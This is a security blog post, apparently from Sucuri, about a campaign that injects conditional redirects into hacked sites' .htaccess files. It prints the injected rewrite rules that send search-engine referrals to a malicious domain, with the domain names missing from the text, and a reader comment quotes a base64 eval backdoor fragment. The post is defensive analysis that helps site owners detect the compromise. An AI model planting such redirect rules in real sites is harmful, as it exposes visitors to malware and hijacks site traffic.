Malware Redirecting To

We are seeing a large number of sites compromised with a conditional redirection to the domain (

On all the sites we analyzed, the .htaccess file was modified so that if anyone visited the site from Google, Bing, Yahoo, or any major search engine (by checking the referer), it would get redirected to that malicious domain (

This is what gets added to the .htaccess file of the hacked sites:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* [R,L]

Google is already blacklisting it and so far it found that it was used to compromise 787 domains (but the number is probably bigger, since that domain just went live 3 days ago – Jan 29):

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 787 domain(s), including,,

What is very interesting is that this malware is hosted at the same IP address as other domains that were used in .htaccess attacks in the past, so we think it is all done by the same group:
.. few more domains ..

We will be monitoring how it is growing and we will post more details soon.

If your site is compromised, check your .htaccess to see if it was modified. If you are not sure, run a scan on your site here:

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • JamesDickinson

    We have an account with 1&1 containing several Website in a root directory. After cleaning the malicious code from all PHP files (‘<?php eval(base64_decode'). The website was site being redirected from google to '; is this because the site is still contains redirecting code or that i need to wait between 5-13hrs as recommend in this post?



  • Steve Z

    I have a friend who runs a blog at the address below and I’m getting this malware warning in Chrome when I try to visit, but when I run it through your site check it comes back clean. 

    Any help or suggestions?

  • Pingback: 2012 Web Malware Trends Report Summary | Sucuri Blog()

Share This